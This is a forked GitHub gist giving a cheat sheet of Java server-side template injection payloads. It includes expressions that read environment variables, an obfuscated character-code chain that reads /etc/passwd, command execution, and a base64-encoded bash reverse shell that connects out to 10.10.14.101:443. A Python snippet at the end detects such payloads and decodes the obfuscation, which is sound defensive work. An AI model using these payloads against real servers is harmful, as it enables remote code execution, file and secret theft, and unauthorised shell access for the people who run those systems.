@emadshanab
Forked from kavishkagihan/java-ssti.md
Created July 24, 2022 04:39
  • Typically, Java SSTI payloads start with $. If that character is banned, you can use * instead.

  • Get env vars

*{T(java.lang.System).getenv()}
  • Read files (/etc/passwd)
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
  • Execute commands
*{T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
  • Get a shell (base64 encoded reverse shell)
*{new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMDEvNDQzIDA+JjE=}|{base64,-d}|{bash,-i}").getInputStream()).next()}
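
For detection and triage, the sketch below flags request values that contain a `${` or `*{` expression with a `T(...)` type reference, and collapses the `Character.toString(N).concat(...)` chains used above back into the string they build. It is an added example, not part of the original gist; the function names and the sample values are constructed for illustration.

```python
import re
from urllib.parse import unquote

OPENER = re.compile(r"[$*]\{")                      # "${" or "*{" expression opener
TYPE_REF = re.compile(r"\bT\(\s*([\w.]+)\s*\)")     # T(fully.qualified.Class)
CHAR_CALL = r"T\(java\.lang\.Character\)\.toString\((\d+)\)"
# A first toString(N) call followed by any number of .concat(toString(N)) links
CHAR_CHAIN = re.compile(CHAR_CALL + r"(?:\.concat\(" + CHAR_CALL + r"\))*")
# Classes the payloads on this page reach for
SENSITIVE = {"java.lang.Runtime", "java.lang.System", "org.apache.commons.io.IOUtils"}

def decode_char_chains(expr):
    """Replace each Character.toString(N).concat(...) chain with the string it builds."""
    def build(match):
        codes = re.findall(CHAR_CALL, match.group(0))
        return repr("".join(chr(int(c)) for c in codes))
    return CHAR_CHAIN.sub(build, expr)

def inspect_value(value):
    """Return a finding for one request value, or None if no type reference is present."""
    text = unquote(value)                   # undo URL encoding before matching
    types = sorted(set(TYPE_REF.findall(text)))
    if not OPENER.search(text) or not types:
        return None
    return {
        "types": types,
        "sensitive": sorted(set(types) & SENSITIVE),
        "decoded": decode_char_chains(text),
    }

# Constructed sample values (not real traffic); the chain uses the first three codes from the page
SAMPLES = [
    "*{user.name}",
    "%2A%7BT(java.lang.System).getenv()%7D",
    "*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime()"
    ".exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97))"
    ".concat(T(java.lang.Character).toString(116))).getInputStream())}",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_value(sample))
```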